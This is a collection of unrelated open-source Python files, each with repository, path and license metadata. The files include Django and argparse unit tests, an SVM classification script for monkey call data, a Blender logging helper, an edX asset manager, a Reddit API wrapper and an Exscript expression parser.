from django.test import TestCase
from app_forum.models import Forum, Comment
from app_forum.forms import CommentForm, ThreadForm
# test for forms
class CommentFormTest(TestCase):
def test_comment_forms(self):
form_data = {
'comment_content' : 'comment'
}
form = CommentForm(data=form_data)
self.assertTrue(form.is_valid())
class ThreadFormTest(TestCase):
def test_thread_forms(self):
thread_data = {
'forum_title' : 'title',
'forum_category' : 'category',
'forum_content' : 'content'
}
thread = ThreadForm(data=thread_data)
self.assertFalse(thread.is_valid())
|
django-id/website
|
app_forum/tests/test_forms.py
|
Python
|
mit
| 685
|
import os
from PIL import Image
from vistas.core.graphics.overlay import BasicOverlayButton
from vistas.core.paths import get_resources_directory
class ExpandButton(BasicOverlayButton):
""" Expand/collapse button for the right panel """
def __init__(self):
self._expanded = False
self.image = Image.open(os.path.join(get_resources_directory(), 'images', 'expand_button.png'))
super().__init__(self.image.transpose(Image.FLIP_LEFT_RIGHT), (0, 20))
@property
def expanded(self):
return self._expanded
@expanded.setter
def expanded(self, expanded):
self._expanded = expanded
self.default_image = self.image if not expanded else self.image.transpose(Image.FLIP_LEFT_RIGHT)
|
VISTAS-IVES/pyvistas
|
source/vistas/ui/controls/expand_button.py
|
Python
|
bsd-3-clause
| 748
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ------------------------------------
# file: manlabeled_nsamples.py
# date: Tue August 05 03:05 2014
# author:
# Maarten Versteegh
# github.com/mwv
# maartenversteegh AT gmail DOT com
#
# Licensed under GPLv3
# ------------------------------------
"""nsamples_performance_supervised: investigate the number of manually labeled examples
needed for performance. replication of mielke_replication but with variable
number of training samples
"""
from __future__ import division
import os
import warnings
warnings.filterwarnings('ignore')
import numpy as np
from sklearn.cross_validation import train_test_split, StratifiedKFold
from sklearn.svm import SVC
from sklearn.grid_search import GridSearchCV
import sklearn.metrics as metrics
MONKEYS = ['Titi_monkeys', 'Blue_monkeys', 'colobus', 'Blue_monkeys_Fuller']
import mielke_replication as mr
def stratified_sample(X, y, n):
"""Sample n elements from X, y, preserving class balance
Arguments:
:param X:
:param y:
:param n:
:param seed:
"""
res = X.shape[0] - n
classes, y_indices = np.unique(y, return_inverse=True)
cls_count = np.bincount(y_indices)
p_i = cls_count / len(y)
n_i = np.maximum(np.round(n * p_i).astype(int),
4) # minimum of four samples per class
t_i = np.minimum(cls_count - n_i, np.round(res * p_i).astype(int))
inds = []
for i, cls in enumerate(classes):
permutation = np.random.permutation(n_i[i]+t_i[i])
cls_i = np.where((y == cls))[0][permutation]
inds.extend(cls_i[:n_i[i]])
inds = np.random.permutation(inds)
return X[inds], y[inds]
def classification_by_monkey(X, y, labelset, param_grid,
n_steps=20, n_folds_test=20, n_folds_gridsearch=5,
verbose=True):
for monkey in X.keys():
if verbose:
print monkey
scores = np.zeros((n_steps, 6))
min_nsamples = len(labelset[monkey]) * 2
for step in range(n_steps):
y_true = None
y_pred = None
avg_nsamples = 0
for fold in range(n_folds_test):
if verbose:
print '\r step: {0:3d}/{1:3d}, fold: {2:3d}'\
.format(step+1, n_steps, fold+1),
X_train, X_test, y_train, y_test = \
train_test_split(X[monkey], y[monkey], test_size=0.1)
steps = np.linspace(min_nsamples,
X_train.shape[0],
n_steps).astype(int)
n_train = steps[step]
X_train, y_train = stratified_sample(X_train, y_train, n_train)
avg_nsamples += X_train.shape[0]
clf = GridSearchCV(SVC(),
param_grid,
cv=StratifiedKFold(y_train,
n_folds=n_folds_gridsearch),
score_func=metrics.accuracy_score,
verbose=0 if verbose else 0, n_jobs=-1)
clf.fit(X_train, y_train)
if y_true is None:
y_true = y_test
y_pred = clf.predict(X_test)
else:
y_true = np.hstack((y_true, y_test))
y_pred = np.hstack((y_pred, clf.predict(X_test)))
avg_nsamples /= n_folds
scores[step] = np.hstack(([avg_nsamples, y_true.shape[0]],
metrics.precision_recall_fscore_support(y_true, y_pred,
average='weighted')[:-1],
[metrics.accuracy_score(y_true, y_pred)]))
np.savetxt('results/clf_by_nsamples_{0}_blue_merged.txt'.format(monkey),
scores, fmt=['%.0f','%.0f', '%.3f','%.3f','%.3f', '%.3f'],
delimiter='\t',
header='nsamples\tsupport\tprecision\trecall\tfscore\taccuracy')
if verbose:
print
def classification_across_monkey(X, y, labelset, param_grid,
n_steps=20, n_folds_test=20,
n_folds_gridsearch=5,
verbose=True):
X, y, labelset = mr.combine_labels(X, y, labelset)
if verbose:
print 'classification across monkey'
min_nsamples = len(labelset) * 2
scores = np.zeros((n_steps, 6))
for step in range(n_steps):
y_true = None
y_pred = None
avg_nsamples = 0
for fold in range(n_folds_test):
if verbose:
print '\r step: {0:3d}/{1:3d}, fold: {2:3d}'\
.format(step+1, n_steps, fold+1),
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1)
steps = np.linspace(min_nsamples,
X_train.shape[0],
n_steps).astype(int)
n_train = steps[step]
X_train, y_train = stratified_sample(X_train, y_train, n_train)
avg_nsamples += X_train.shape[0]
clf = GridSearchCV(SVC(),
param_grid,
cv=StratifiedKFold(y_train,
n_folds=n_folds_gridsearch),
score_func=metrics.accuracy_score,
verbose=0, n_jobs=-1)
clf.fit(X_train, y_train)
if y_true is None:
y_true = y_test
y_pred = clf.predict(X_test)
else:
y_true = np.hstack((y_true, y_test))
y_pred = np.hstack((y_pred, clf.predict(X_test)))
avg_nsamples /= n_folds
scores[step] = np.hstack(([avg_nsamples, y_true.shape[0]],
metrics.precision_recall_fscore_support(y_true, y_pred,
average='weighted')[:-1],
[metrics.accuracy_score(y_true, y_pred)]))
np.savetxt('results/clf_across_nsamples_blue_merged.txt',
scores, fmt=['%.0f','%.0f', '%.3f','%.3f','%.3f', '%.3f'],
delimiter='\t',
header='nsamples\tsupport\tprecision\trecall\tfscore\taccuracy')
if verbose:
print
if __name__ == '__main__':
X, y, labelset = mr.load_all_monkeys()
from svc_param_grid import param_grid
n_steps = 25
n_folds = 10
try:
os.makedirs('results')
except OSError:
pass
classification_by_monkey(X, y, labelset, param_grid,
n_steps=n_steps,
n_folds_test=n_folds)
classification_across_monkey(X, y, labelset, param_grid,
n_steps=n_steps,
n_folds_test=n_folds)
|
bootphon/monkey_business
|
nsamples_performance_supervised.py
|
Python
|
gpl-2.0
| 7,035
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from openstack.key_management import key_management_service
class TestKeyManagementService(testtools.TestCase):
def test_service(self):
sot = key_management_service.KeyManagementService()
self.assertEqual('key-manager', sot.service_type)
self.assertEqual('public', sot.interface)
self.assertIsNone(sot.region)
self.assertIsNone(sot.service_name)
self.assertEqual(1, len(sot.valid_versions))
self.assertEqual('v1', sot.valid_versions[0].module)
self.assertEqual('v1', sot.valid_versions[0].path)
|
sjsucohort6/openstack
|
python/venv/lib/python2.7/site-packages/openstack/tests/unit/key_management/test_key_management_service.py
|
Python
|
mit
| 1,130
|
import argparse
import sys
import unittest
from argparse import ArgumentParser, FileType
from gooey import GooeyParser
from gooey.python_bindings import argparse_to_json
from gooey.util.functional import getin
from gooey.tests import *
from gui.components.options.options import FileChooser
from gui.components.widgets import FileSaver
class TestArgparse(unittest.TestCase):
def test_mutex_groups_conversion(self):
"""
Ensure multiple mutex groups are processed correctly.
"""
parser = ArgumentParser()
g1 = parser.add_mutually_exclusive_group(required=True)
g1.add_argument('--choose1')
g1.add_argument('--choose2')
g2 = parser.add_mutually_exclusive_group(required=True)
g2.add_argument('--choose3')
g2.add_argument('--choose4')
output = argparse_to_json.process(parser, {}, {}, {})
# assert that we get two groups of two choices back
items = output[0]['items']
self.assertTrue(len(items) == 2)
group1 = items[0]
group2 = items[1]
self.assertTrue(['--choose1'] in group1['data']['commands'])
self.assertTrue(['--choose2'] in group1['data']['commands'])
self.assertTrue(['--choose3'] in group2['data']['commands'])
self.assertTrue(['--choose4'] in group2['data']['commands'])
self.assertTrue(group1['type'] == 'RadioGroup')
self.assertTrue(group2['type'] == 'RadioGroup')
def test_json_iterable_conversion(self):
"""
Issue #312 - tuples weren't being coerced to list during argparse
conversion causing downstream issues when concatenating
"""
# our original functionality accepted only lists as the choices arg
parser = ArgumentParser()
parser.add_argument("-foo", choices=['foo','bar', 'baz'])
result = argparse_to_json.action_to_json(parser._actions[-1], "Dropdown", {})
choices = result['data']['choices']
self.assertTrue(isinstance(choices, list))
self.assertEqual(choices, ['foo','bar', 'baz'])
# Now we allow tuples as well.
parser = ArgumentParser()
parser.add_argument("-foo", choices=('foo','bar', 'baz'))
result = argparse_to_json.action_to_json(parser._actions[-1], "Dropdown", {})
choices = result['data']['choices']
self.assertTrue(isinstance(choices, list))
self.assertEqual(choices, ['foo','bar', 'baz'])
def test_choice_string_cooersion(self):
"""
Issue 321 - must coerce choice types to string to support wx.ComboBox
"""
parser = ArgumentParser()
parser.add_argument('--foo', default=1, choices=[1, 2, 3])
choice_action = parser._actions[-1]
result = argparse_to_json.action_to_json(choice_action, 'Dropdown', {})
self.assertEqual(getin(result, ['data', 'choices']), ['1', '2', '3'])
# default value is also converted to a string type
self.assertEqual(getin(result, ['data', 'default']), '1')
def test_choice_string_cooersion_no_default(self):
"""
Make sure that choice types without a default don't create
the literal string "None" but stick with the value None
"""
parser = ArgumentParser()
parser.add_argument('--foo', choices=[1, 2, 3])
choice_action = parser._actions[-1]
result = argparse_to_json.action_to_json(choice_action, 'Dropdown', {})
self.assertEqual(getin(result, ['data', 'default']), None)
def test_listbox_defaults_cast_correctly(self):
"""
Issue XXX - defaults supplied in a list were turned into a string
wholesale (list and all). The defaults should be stored as a list
proper with only the _internal_ values coerced to strings.
"""
parser = GooeyParser()
parser.add_argument('--foo', widget="Listbox", nargs="*", choices=[1, 2, 3], default=[1, 2])
choice_action = parser._actions[-1]
result = argparse_to_json.action_to_json(choice_action, 'Listbox', {})
self.assertEqual(getin(result, ['data', 'default']), ['1', '2'])
def test_listbox_single_default_cast_correctly(self):
"""
Single arg defaults to listbox should be wrapped in a list and
their contents coerced as usual.
"""
parser = GooeyParser()
parser.add_argument('--foo', widget="Listbox",
nargs="*", choices=[1, 2, 3], default="sup")
choice_action = parser._actions[-1]
result = argparse_to_json.action_to_json(choice_action, 'Listbox', {})
self.assertEqual(getin(result, ['data', 'default']), ['sup'])
def test_non_data_defaults_are_dropped_entirely(self):
"""
This is a refinement in understanding of Issue #147
Caused by Issue 377 - passing arbitrary objects as defaults
causes failures.
"""
# passing plain data to cleaning function results in plain data
# being returned
data = ['abc',
123,
['a', 'b'],
[1, 2, 3]]
for datum in data:
result = argparse_to_json.clean_default(datum)
self.assertEqual(result, datum)
# passing in complex objects results in None
objects = [sys.stdout, sys.stdin, object(), max, min]
for obj in objects:
result = argparse_to_json.clean_default(obj)
self.assertEqual(result, None)
def test_suppress_is_removed_as_default_value(self):
"""
Issue #469
Argparse uses the literal string ==SUPPRESS== as an internal flag.
When encountered in Gooey, these should be dropped and mapped to `None`.
"""
parser = ArgumentParser(prog='test_program')
parser.add_argument("--foo", default=argparse.SUPPRESS)
parser.add_argument('--version', action='version', version='1.0')
result = argparse_to_json.convert(parser, required_cols=2, optional_cols=2)
groups = getin(result, ['widgets', 'test_program', 'contents'])
for item in groups[0]['items']:
self.assertEqual(getin(item, ['data', 'default']), None)
def test_version_maps_to_checkbox(self):
testcases = [
[['--version'], {}, 'TextField'],
# we only remap if the action is version
# i.e. we don't care about the argument name itself
[['--version'], {'action': 'store'}, 'TextField'],
# should get mapped to CheckBox because of the action
[['--version'], {'action': 'version'}, 'CheckBox'],
# ditto, even through the 'name' isn't 'version'
[['--foobar'], {'action': 'version'}, 'CheckBox'],
]
for args, kwargs, expectedType in testcases:
with self.subTest([args, kwargs]):
parser = argparse.ArgumentParser(prog='test')
parser.add_argument(*args, **kwargs)
result = argparse_to_json.convert(parser, required_cols=2, optional_cols=2)
contents = getin(result, ['widgets', 'test', 'contents'])[0]
self.assertEqual(contents['items'][0]['type'], expectedType)
def test_textinput_with_list_default_mapped_to_cli_friendly_value(self):
"""
Issue: #500
Using nargs and a `default` value with a list causes the literal list string
to be put into the UI.
"""
testcases = [
{'nargs': '+', 'default': ['a b', 'c'], 'gooey_default': '"a b" "c"', 'w': 'TextField'},
{'nargs': '*', 'default': ['a b', 'c'], 'gooey_default': '"a b" "c"', 'w': 'TextField'},
{'nargs': '...', 'default': ['a b', 'c'], 'gooey_default': '"a b" "c"', 'w': 'TextField'},
{'nargs': 2, 'default': ['a b', 'c'], 'gooey_default': '"a b" "c"', 'w': 'TextField'},
# TODO: this demos the current nargs behavior for string defaults, but
# TODO: it is wrong! These should be wrapped in quotes so spaces aren't
# TODO: interpreted as unique arguments.
{'nargs': '+', 'default': 'a b', 'gooey_default': 'a b', 'w': 'TextField'},
{'nargs': '*', 'default': 'a b', 'gooey_default': 'a b', 'w': 'TextField'},
{'nargs': '...', 'default': 'a b', 'gooey_default': 'a b', 'w': 'TextField'},
{'nargs': 1, 'default': 'a b', 'gooey_default': 'a b', 'w': 'TextField'},
# Listbox has special nargs handling which keeps the list in tact.
{'nargs': '+', 'default': ['a b', 'c'], 'gooey_default': ['a b', 'c'], 'w': 'Listbox'},
{'nargs': '*', 'default': ['a b', 'c'], 'gooey_default': ['a b', 'c'], 'w': 'Listbox'},
{'nargs': '...', 'default': ['a b', 'c'], 'gooey_default': ['a b', 'c'],'w': 'Listbox'},
{'nargs': 2, 'default': ['a b', 'c'], 'gooey_default': ['a b', 'c'], 'w': 'Listbox'},
{'nargs': '+', 'default': 'a b', 'gooey_default': ['a b'], 'w': 'Listbox'},
{'nargs': '*', 'default': 'a b', 'gooey_default': ['a b'], 'w': 'Listbox'},
{'nargs': '...', 'default': 'a b', 'gooey_default': ['a b'], 'w': 'Listbox'},
{'nargs': 1, 'default': 'a b', 'gooey_default': ['a b'], 'w': 'Listbox'},
]
for case in testcases:
with self.subTest(case):
parser = ArgumentParser(prog='test_program')
parser.add_argument('--foo', nargs=case['nargs'], default=case['default'])
action = parser._actions[-1]
result = argparse_to_json.handle_initial_values(action, case['w'], action.default)
self.assertEqual(result, case['gooey_default'])
def test_nargs(self):
"""
so there are just a few simple rules here:
if nargs in [*, N, +, remainder]:
default MUST be a list OR we must map it to one
action:_StoreAction
- nargs '?'
- default:validate list is invalid
- default:coerce stringify
- nargs #{*, N, +, REMAINDER}
- default:validate None
- default:coerce
if string: stringify
if list: convert from list to cli style input string
action:_StoreConstAction
- nargs: invalid
- defaults:stringify
action:{_StoreFalseAction, _StoreTrueAction}
- nargs: invalid
- defaults:validate: require bool
- defaults:coerce: no stringify; leave bool
action:_CountAction
- nargs: invalid
- default:validate: must be numeric index within range OR None
- default:coerce: integer or None
action:_AppendAction
TODO: NOT CURRENTLY SUPPORTED BY GOOEY
nargs behavior is weird and needs to be understood.
- nargs
action:CustomUserAction:
- nargs: no way to know expected behavior. Ignore
- default: jsonify type if possible.
"""
parser = ArgumentParser()
parser.add_argument(
'--bar',
nargs='+',
choices=["one", "two"],
default="one",
)
def test_filetype_chooses_good_widget(self):
"""
#743 chose the picker type based on the FileType mode
when available.
"""
cases = [
(FileType(), 'FileChooser'),
(FileType('r'), 'FileChooser'),
(FileType('rb'), 'FileChooser'),
(FileType('rt'), 'FileChooser'),
(FileType('w'), 'FileSaver'),
(FileType('wt'), 'FileSaver'),
(FileType('wb'), 'FileSaver'),
(FileType('a'), 'FileSaver'),
(FileType('x'), 'FileSaver'),
(FileType('+'), 'FileSaver'),
]
for filetype, expected_widget in cases:
with self.subTest(f'expect {filetype} to produce {expected_widget})'):
parser = ArgumentParser()
parser.add_argument('foo', type=filetype)
action = [parser._actions[-1]]
result = next(argparse_to_json.categorize(action, {}, {}))
self.assertEqual(result['type'], expected_widget)
|
chriskiehl/Gooey
|
gooey/tests/test_argparse_to_json.py
|
Python
|
mit
| 12,621
|
import tmt
DESCRIPTION = "A dead simple svg generation library written in pure Java, with no dependencies. This code runs on both desktop Java, Android, and compiles to Javascript with GWT."
tmt.EclipseProject(tmt.projectName(), description=DESCRIPTION)
|
pedrosino/tnoodle
|
svglite/tmtproject.py
|
Python
|
gpl-3.0
| 256
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import os
import re
import platform
LOG_FILE_PATH = os.path.realpath(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'log.txt'))
LOG_CONVERT = re.compile("\033\[[0-9;]+m")
NUMBER_OF_WARNINGS = 0
def clear_log():
global NUMBER_OF_WARNINGS
NUMBER_OF_WARNINGS = 0
with open(LOG_FILE_PATH, mode='w', encoding='utf-8', ):
# clear log file..
pass
clear_log()
def copy_paste_log(log_file_path):
import shutil
shutil.copyfile(LOG_FILE_PATH, log_file_path)
class LogStyles:
NORMAL = "\033[40m\033[32m"
HEADER = "\033[46m\033[30m"
MESSAGE = "\033[42m\033[30m"
WARNING = "\033[43m\033[1;30mWARNING: "
ERROR = "\033[41m\033[1;30mERROR: "
END = "\033[0m"
EOL = "\n"
if(platform.system() == 'Windows'):
# no pretty logging for windows
LogStyles.NORMAL = ""
LogStyles.HEADER = ""
LogStyles.MESSAGE = ""
LogStyles.WARNING = "WARNING: "
LogStyles.ERROR = "ERROR: "
LogStyles.END = ""
def log(msg="", indent=0, style=LogStyles.NORMAL, instance=None, prefix="> ", ):
global NUMBER_OF_WARNINGS
if(style == LogStyles.WARNING):
NUMBER_OF_WARNINGS += 1
if(instance is None):
inst = ""
else:
cn = instance.__class__.__name__
cl = cn.split(".")
inst = "{0}: ".format(cl[-1])
m = "{0}{1}{2}{3}{4}{5}".format(" " * indent, style, prefix, inst, msg, LogStyles.END)
print(m)
with open(LOG_FILE_PATH, mode='a', encoding='utf-8', ) as f:
f.write("{}{}".format(re.sub(LOG_CONVERT, '', m), LogStyles.EOL))
def log_args(locals, self, header="arguments: ", indent=1, style=LogStyles.NORMAL, prefix="> ", ):
import inspect
l = dict([(k, v) for k, v in locals.items() if v != self and k != '__class__'])
f = [i for i in inspect.getfullargspec(self.__init__).args if i != 'self']
t = " "
s = " "
hl = 0
for i in f:
if(len(i) > hl):
hl = len(i)
# hl += 1
vs = ["{0}: {1}".format(i.ljust(hl, s), l[i]) for i in f]
for i, v in enumerate(vs):
if(i == 0):
vs[i] = "{0}{1}\n".format(header, v)
elif(i == len(vs) - 1):
vs[i] = "{0}{1}{2}{3}".format(t * indent, s * len(prefix), s * len(header), v)
else:
vs[i] = "{0}{1}{2}{3}\n".format(t * indent, s * len(prefix), s * len(header), v)
log("".join(vs), indent, style, None, prefix, )
|
uhlik/render_maxwell
|
log.py
|
Python
|
gpl-2.0
| 3,222
|
"""
Asset Manager
Interface allowing course asset saving/retrieving.
Handles:
- saving asset in the BlobStore -and- saving asset metadata in course modulestore.
- retrieving asset metadata from course modulestore -and- returning URL to asset -or- asset bytes.
Phase 1: Checks to see if an asset's metadata can be found in the course's modulestore.
If not found, fails over to access the asset from the contentstore.
At first, the asset metadata will never be found, since saving isn't implemented yet.
Note: Hotfix (PLAT-734) No asset calls find_asset_metadata, and directly accesses from contentstore.
"""
from contracts import contract, new_contract
from opaque_keys.edx.keys import AssetKey
from xmodule.contentstore.django import contentstore
new_contract('AssetKey', AssetKey)
class AssetException(Exception):
"""
Base exception class for all exceptions related to assets.
"""
pass # lint-amnesty, pylint: disable=unnecessary-pass
class AssetMetadataNotFound(AssetException):
"""
Thrown when no asset metadata is present in the course modulestore for the particular asset requested.
"""
pass # lint-amnesty, pylint: disable=unnecessary-pass
class AssetMetadataFoundTemporary(AssetException):
"""
TEMPORARY: Thrown if asset metadata is actually found in the course modulestore.
"""
pass # lint-amnesty, pylint: disable=unnecessary-pass
class AssetManager(object):
"""
Manager for saving/loading course assets.
"""
@staticmethod
@contract(asset_key='AssetKey', throw_on_not_found='bool', as_stream='bool')
def find(asset_key, throw_on_not_found=True, as_stream=False):
"""
Finds course asset in the deprecated contentstore.
This method was previously searching for the course asset in the assetstore first, then in the deprecated
contentstore. However, the asset was never found in the assetstore since an asset's metadata is
not yet stored there.(removed calls to modulestore().find_asset_metadata(asset_key))
The assetstore search was removed due to performance issues caused by each call unpickling the pickled and
compressed course structure from the structure cache.
"""
return contentstore().find(asset_key, throw_on_not_found, as_stream)
|
stvstnfrd/edx-platform
|
common/lib/xmodule/xmodule/assetstore/assetmgr.py
|
Python
|
agpl-3.0
| 2,322
|
__author__ = 'idclark'
import requests as r
def about_subreddit(sr):
"""get an overview for a given subreddit
> running = about_subreddit('running')
"""
url = r'http://www.reddit.com/r/{sr}/about.json'.format(sr=sr)
response = r.get(url)
return response.json()['data']
def my_subreddits(client, status, limit):
"""
return a list of subreddits an account is subscribed to.
client requires running accounts.user_login() first to start a user session
status: 'subscriber', 'moderator', 'contributor'
limit: max of 100
> my_subs = my_subreddits(client, 'contributor', limit=25)
"""
url = r'http://www.reddit.com/subreddits/mine/{st}.json'.format(st=status)
data = {'limit': limit}
response = client.get(url, data=data)
return response.json()['data']
#TODO this returns 404 ??
def recommend_subreddits(srnames, omit):
"""
Inputs: srnames = comma sep list of subreddits
omit: subreddits to ommit from the reccommendation
"""
data = {'srnames': ",".join(srnames), 'omit': ",".join(omit)}
url = r'http://www.reddit.com/api/subreddit_recommendations'
response = r.get(url, data=data)
return response.content
#TODO this returns an empty list...
def search_by_topic(query):
"""
search subreddits by inputting a given topic
"""
data = {'query': str(query)}
url = r'http://www.reddit.com/api/subreddits_by_topic.json'
response = r.get(url, data=data)
return response.json()['data']
def subreddits_by_rank(criteria, limit=3):
"""
returns list of subreddits according to given criteria
criteria: popular, new, banned
> most_popular_subs = subreddits_by_rank('popular', limit=10)
"""
data = {'limit': limit}
url = r'http://www.reddit.com/subreddits/{c}.json'.format(c=criteria)
response = r.get(url, data=data)
return response.json()['data']['children']
def list_subreddit_submissions(subreddit, criteria):
"""
for a given subreddit, return a list of articles, sorted by the given criteria:
hot, new, random
> python_subs = list_subreddit_submissions('python', 'hot')
"""
criteria_choices = ['hot', 'new', 'random']
if criteria not in criteria_choices:
raise Exception('Please enter a valid criteria choice')
url = r'http://www.reddit.com/r/{s}/{c}.json'.format(s=subreddit, c=criteria)
response = r.get(url)
data = response.json()
children = data['data']['children']
return children
|
idclark/wrap-it-up
|
reddit_py/subreddits.py
|
Python
|
mit
| 2,511
|
# Copyright (C) 2007-2010 Samuel Abels.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import Term
from Exscript.parselib import Token
class ExpressionNode(Token):
def __init__(self, lexer, parser, parent, parent_node = None):
# Skip whitespace before initializing the token to make sure that self.start
# points to the beginning of the expression (which makes for prettier error
# messages).
lexer.skip(['whitespace', 'newline'])
Token.__init__(self, 'ExpressionNode', lexer, parser, parent)
self.lft = None
self.rgt = None
self.op = None
self.op_type = None
self.parent_node = parent_node
# The "not" operator requires special treatment because it is
# positioned left of the term.
if not lexer.current_is('logical_operator', 'not'):
self.lft = Term.Term(lexer, parser, parent)
# The expression may end already (a single term is also an
# expression).
lexer.skip(['whitespace', 'newline'])
if not lexer.current_is('arithmetic_operator') and \
not lexer.current_is('logical_operator') and \
not lexer.current_is('comparison') and \
not lexer.current_is('regex_delimiter'):
self.mark_end()
return
# Expect the operator.
self.op_type, self.op = lexer.token()
if not lexer.next_if('arithmetic_operator') and \
not lexer.next_if('logical_operator') and \
not lexer.next_if('comparison') and \
not lexer.next_if('regex_delimiter'):
self.mark_end()
msg = 'Expected operator but got %s' % self.op_type
lexer.syntax_error(msg, self)
# Expect the second term.
self.rgt = ExpressionNode(lexer, parser, parent, self)
self.mark_end()
def priority(self):
if self.op is None:
return 8
elif self.op_type == 'arithmetic_operator' and self.op == '%':
return 7
elif self.op_type == 'arithmetic_operator' and self.op == '*':
return 6
elif self.op_type == 'regex_delimiter':
return 6
elif self.op_type == 'arithmetic_operator' and self.op != '.':
return 5
elif self.op == '.':
return 4
elif self.op_type == 'comparison':
return 3
elif self.op == 'not':
return 2
elif self.op_type == 'logical_operator':
return 1
else:
raise Exception('Invalid operator.')
def value(self, context):
# Special behavior where we only have one term.
if self.op is None:
return self.lft.value(context)
elif self.op == 'not':
return [not self.rgt.value(context)[0]]
# There are only two types of values: Regular expressions and lists.
# We also have to make sure that empty lists do not cause an error.
lft_lst = self.lft.value(context)
if type(lft_lst) == type([]):
if len(lft_lst) > 0:
lft = lft_lst[0]
else:
lft = ''
rgt_lst = self.rgt.value(context)
if type(rgt_lst) == type([]):
if len(rgt_lst) > 0:
rgt = rgt_lst[0]
else:
rgt = ''
if self.op_type == 'arithmetic_operator' and self.op != '.':
error = 'Operand for %s is not a number' % (self.op)
try:
lft = int(lft)
except ValueError:
self.lexer.runtime_error(error, self.lft)
try:
rgt = int(rgt)
except ValueError:
self.lexer.runtime_error(error, self.rgt)
# Two-term expressions.
if self.op == 'is':
return [lft == rgt]
elif self.op == 'matches':
regex = rgt_lst
# The "matches" keyword requires a regular expression as the right hand
# operand. The exception throws if "regex" does not have a match() method.
try:
regex.match(str(lft))
except AttributeError:
error = 'Right hand operator is not a regular expression'
self.lexer.runtime_error(error, self.rgt)
for line in lft_lst:
if regex.search(str(line)):
return [1]
return [0]
elif self.op == 'is not':
#print "LFT: '%s', RGT: '%s', RES: %s" % (lft, rgt, [lft != rgt])
return [lft != rgt]
elif self.op == 'in':
return [lft in rgt_lst]
elif self.op == 'not in':
return [lft not in rgt_lst]
elif self.op == 'ge':
return [int(lft) >= int(rgt)]
elif self.op == 'gt':
return [int(lft) > int(rgt)]
elif self.op == 'le':
return [int(lft) <= int(rgt)]
elif self.op == 'lt':
return [int(lft) < int(rgt)]
elif self.op == 'and':
return [lft and rgt]
elif self.op == 'or':
return [lft or rgt]
elif self.op == '*':
return [int(lft) * int(rgt)]
elif self.op == '/':
return [int(lft) / int(rgt)]
elif self.op == '%':
return [int(lft) % int(rgt)]
elif self.op == '.':
return [str(lft) + str(rgt)]
elif self.op == '+':
return [int(lft) + int(rgt)]
elif self.op == '-':
return [int(lft) - int(rgt)]
def dump(self, indent = 0):
print (' ' * indent) + self.name, self.op, 'start'
if self.lft is not None:
self.lft.dump(indent + 1)
print (' ' * (indent + 1)) + 'Operator', self.op
if self.rgt is not None:
self.rgt.dump(indent + 1)
print (' ' * indent) + self.name, self.op, 'end.'
|
gnperumal/exscript
|
src/Exscript/interpreter/ExpressionNode.py
|
Python
|
gpl-2.0
| 6,560
|
import time
class Timer:
def __init__(self, verbose=False):
self.verbose = verbose
def __enter__(self):
self.start = time.time()
return self
def __exit__(self, *args):
self.end = time.time()
self.secs = self.end - self.start
self.msecs = self.secs * 1000 # millisecs
if self.verbose:
print 'elapsed time: %f ms' % self.msecs
|
caynan/adsd
|
measuringProject/app/timer.py
|
Python
|
mit
| 409
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.